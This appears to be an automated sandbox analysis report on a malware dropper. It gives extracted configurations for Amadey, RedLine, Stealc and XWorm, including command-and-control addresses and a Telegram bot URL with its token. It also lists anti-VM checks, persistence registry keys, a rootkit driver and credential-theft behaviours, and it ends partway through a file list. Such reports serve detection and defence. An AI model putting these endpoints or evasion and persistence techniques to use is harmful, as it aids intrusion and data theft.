Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-04-2024 17:01
Static task
static1
Behavioral task
behavioral1
Sample
c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral2
Sample
c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe
Resource
win11-20240426-en
General
-
Target
c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe
-
Size
1.8MB
-
MD5
998693d9eec95c25eb49b2bef57031af
-
SHA1
46bc7b8d0bf5fb187abc1037ca8593d70f1100f6
-
SHA256
c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54
-
SHA512
56db5bd7f0698492bf829b55d088d1581ea8cf809e26ec792daaf85a5a4946531b51e0935fa9b6bbc3a390e8e7f078f5d7ed7b0eccc9ef1bda4091688646a838
-
SSDEEP
49152:60X38PlXdE0fyCZ7P5xwzwm+XtT0Pz2BLrATSzT0cPbD:6q2E0fyCVP5zdwr2ZscjD
Malware Config
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
http://185.172.128.150
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
-
Install_directory
%AppData%
-
install_file
explorer.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe family_xworm behavioral2/memory/3560-290-0x00000000009F0000-0x0000000000A02000-memory.dmp family_xworm -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3712-74-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_zgrat_v1 behavioral2/memory/804-101-0x0000000000460000-0x0000000000520000-memory.dmp family_zgrat_v1 -
Glupteba payload 9 IoCs
Processes:
resource yara_rule behavioral2/memory/836-811-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/3672-812-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1348-876-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/244-877-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/244-987-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1348-1022-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1348-1034-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/2952-1320-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/2952-1340-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
olLriDTodnhlhNqsfTzJYRiU.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" olLriDTodnhlhNqsfTzJYRiU.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe family_redline behavioral2/memory/1348-96-0x0000000000A60000-0x0000000000AB2000-memory.dmp family_redline behavioral2/memory/804-101-0x0000000000460000-0x0000000000520000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline behavioral2/memory/572-178-0x0000000000420000-0x0000000000472000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
olLriDTodnhlhNqsfTzJYRiU.exec52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exechrosha.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ olLriDTodnhlhNqsfTzJYRiU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe -
Blocklisted process makes network request 5 IoCs
Processes:
rundll32.exerundll32.exerundll32.exemsiexec.exeflow pid process 35 1808 rundll32.exe 60 3964 rundll32.exe 103 5412 rundll32.exe 60 3964 rundll32.exe 110 4108 msiexec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
MsiExec.exedescription ioc process File opened for modification C:\Windows\system32\DRIVERS\SET69DC.tmp MsiExec.exe File created C:\Windows\system32\DRIVERS\SET69DC.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\VBoxDrv.sys MsiExec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 5380 netsh.exe 2096 netsh.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exeolLriDTodnhlhNqsfTzJYRiU.exerundll32.exec52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exechrosha.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion olLriDTodnhlhNqsfTzJYRiU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion olLriDTodnhlhNqsfTzJYRiU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
sXxfxiL.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Control Panel\International\Geo\Nation sXxfxiL.exe -
Executes dropped EXE 42 IoCs
Processes:
chrosha.exeswiiiii.exealexxxxxxxx.exekeks.exetrf.exegold.exeNewB.exejok.exeswiiii.exefile300un.exemstc.exeCjwclzs0EungII7uFfbPEY2H.exeiysAcluMQcM8JDfAwR0llgs6.exeFur6VRjhskC9mU3vFPxSIc2H.exeu2zg.0.exerun.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exeu2zg.3.exeFur6VRjhskC9mU3vFPxSIc2H.exeiysAcluMQcM8JDfAwR0llgs6.exeAUWFjIOuq4vJkCnAMCpu3BX3.exeInstall.exeInstall.exeAssistant_109.0.5097.45_Setup.exe_sfx.exeolLriDTodnhlhNqsfTzJYRiU.exeassistant_installer.exeassistant_installer.execsrss.exeinjector.exeexplorer.exeNewB.exewindefender.exewindefender.exesXxfxiL.exeexplorer.exeNewB.exe269xoqmLlAArxxjNLYSvtI2S.exece-installer_7.14.2_vbox-6.1.20.exepid process 1072 chrosha.exe 2016 swiiiii.exe 2992 alexxxxxxxx.exe 1348 keks.exe 804 trf.exe 2528 gold.exe 4656 NewB.exe 572 jok.exe 4564 swiiii.exe 1936 file300un.exe 3560 mstc.exe 3868 Cjwclzs0EungII7uFfbPEY2H.exe 836 iysAcluMQcM8JDfAwR0llgs6.exe 3672 Fur6VRjhskC9mU3vFPxSIc2H.exe 1096 u2zg.0.exe 1272 run.exe 4900 j8F8cQWmBXz0EcdH8M6kRmwS.exe 2860 j8F8cQWmBXz0EcdH8M6kRmwS.exe 1020 j8F8cQWmBXz0EcdH8M6kRmwS.exe 5032 j8F8cQWmBXz0EcdH8M6kRmwS.exe 5024 j8F8cQWmBXz0EcdH8M6kRmwS.exe 4480 u2zg.3.exe 1348 Fur6VRjhskC9mU3vFPxSIc2H.exe 244 iysAcluMQcM8JDfAwR0llgs6.exe 4072 AUWFjIOuq4vJkCnAMCpu3BX3.exe 3992 Install.exe 5268 Install.exe 5820 Assistant_109.0.5097.45_Setup.exe_sfx.exe 5576 olLriDTodnhlhNqsfTzJYRiU.exe 5060 assistant_installer.exe 5236 assistant_installer.exe 2952 csrss.exe 3220 injector.exe 1052 explorer.exe 5648 NewB.exe 4204 windefender.exe 560 windefender.exe 2584 sXxfxiL.exe 5824 explorer.exe 3540 NewB.exe 5384 269xoqmLlAArxxjNLYSvtI2S.exe 5488 ce-installer_7.14.2_vbox-6.1.20.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exechrosha.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine chrosha.exe -
Loads dropped DLL 22 IoCs
Processes:
rundll32.exerundll32.exerun.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exerundll32.exeassistant_installer.exeassistant_installer.exerundll32.exeMsiExec.exeMsiExec.exeu2zg.0.exepid process 3052 rundll32.exe 1808 rundll32.exe 1272 run.exe 4900 j8F8cQWmBXz0EcdH8M6kRmwS.exe 2860 j8F8cQWmBXz0EcdH8M6kRmwS.exe 1020 j8F8cQWmBXz0EcdH8M6kRmwS.exe 5032 j8F8cQWmBXz0EcdH8M6kRmwS.exe 5024 j8F8cQWmBXz0EcdH8M6kRmwS.exe 3964 rundll32.exe 5060 assistant_installer.exe 5060 assistant_installer.exe 5236 assistant_installer.exe 5236 assistant_installer.exe 5412 rundll32.exe 2584 MsiExec.exe 952 MsiExec.exe 952 MsiExec.exe 1096 u2zg.0.exe 1096 u2zg.0.exe 952 MsiExec.exe 952 MsiExec.exe 2584 MsiExec.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 14 IoCs
Processes:
msiexec.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ThreadingModel = "Both" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\LocalServer32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxProxyStub.dll" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxC.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32\ThreadingModel = "Free" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSDS.exe\"" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxC.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ThreadingModel = "Free" msiexec.exe -
Processes:
resource yara_rule C:\Users\Admin\Pictures\olLriDTodnhlhNqsfTzJYRiU.exe themida behavioral2/memory/5576-1087-0x0000000140000000-0x0000000140749000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
Fur6VRjhskC9mU3vFPxSIc2H.execsrss.exe269xoqmLlAArxxjNLYSvtI2S.exemstc.exeiysAcluMQcM8JDfAwR0llgs6.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" Fur6VRjhskC9mU3vFPxSIc2H.exe Set value (str) \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 269xoqmLlAArxxjNLYSvtI2S.exe Set value (str) \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" mstc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" iysAcluMQcM8JDfAwR0llgs6.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
olLriDTodnhlhNqsfTzJYRiU.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA olLriDTodnhlhNqsfTzJYRiU.exe -
Drops Chrome extension 2 IoCs
Processes:
sXxfxiL.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json sXxfxiL.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json sXxfxiL.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
sXxfxiL.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini sXxfxiL.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exej8F8cQWmBXz0EcdH8M6kRmwS.exej8F8cQWmBXz0EcdH8M6kRmwS.exedescription ioc process File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\D: j8F8cQWmBXz0EcdH8M6kRmwS.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\D: j8F8cQWmBXz0EcdH8M6kRmwS.exe File opened (read-only) \??\F: j8F8cQWmBXz0EcdH8M6kRmwS.exe File opened (read-only) \??\F: j8F8cQWmBXz0EcdH8M6kRmwS.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com 7 api.myip.com 20 ipinfo.io 72 api.myip.com 73 ipinfo.io -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 50 IoCs
Processes:
powershell.exesXxfxiL.exeMsiExec.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exeolLriDTodnhlhNqsfTzJYRiU.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol sXxfxiL.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.sys MsiExec.exe File opened for modification C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf MsiExec.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.cat MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA sXxfxiL.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt MsiExec.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F sXxfxiL.exe File opened for modification C:\Windows\system32\DRVSTORE MsiExec.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 sXxfxiL.exe File opened for modification C:\Windows\System32\GroupPolicy olLriDTodnhlhNqsfTzJYRiU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA sXxfxiL.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol olLriDTodnhlhNqsfTzJYRiU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI olLriDTodnhlhNqsfTzJYRiU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 sXxfxiL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F sXxfxiL.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini olLriDTodnhlhNqsfTzJYRiU.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exechrosha.exeolLriDTodnhlhNqsfTzJYRiU.exepid process 1380 c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe 1072 chrosha.exe 5576 olLriDTodnhlhNqsfTzJYRiU.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exerun.execmd.exedescription pid process target process PID 2016 set thread context of 4848 2016 swiiiii.exe RegAsm.exe PID 2992 set thread context of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 2528 set thread context of 1492 2528 gold.exe RegAsm.exe PID 4564 set thread context of 3564 4564 swiiii.exe RegAsm.exe PID 1936 set thread context of 4472 1936 file300un.exe msbuild.exe PID 1272 set thread context of 2228 1272 run.exe cmd.exe PID 2228 set thread context of 5808 2228 cmd.exe MSBuild.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
Fur6VRjhskC9mU3vFPxSIc2H.exeiysAcluMQcM8JDfAwR0llgs6.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN Fur6VRjhskC9mU3vFPxSIc2H.exe File opened (read-only) \??\VBoxMiniRdrDN iysAcluMQcM8JDfAwR0llgs6.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exesXxfxiL.exedescription ioc process File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ja.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_nl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_hu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\ubuntu_preseed.cfg msiexec.exe File created C:\Program Files (x86)\qIYKRzUEasUn\vCxVHas.dll sXxfxiL.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fa.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fr.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_it.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\VBoxClient-x86.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_de.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_es.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ca.qm 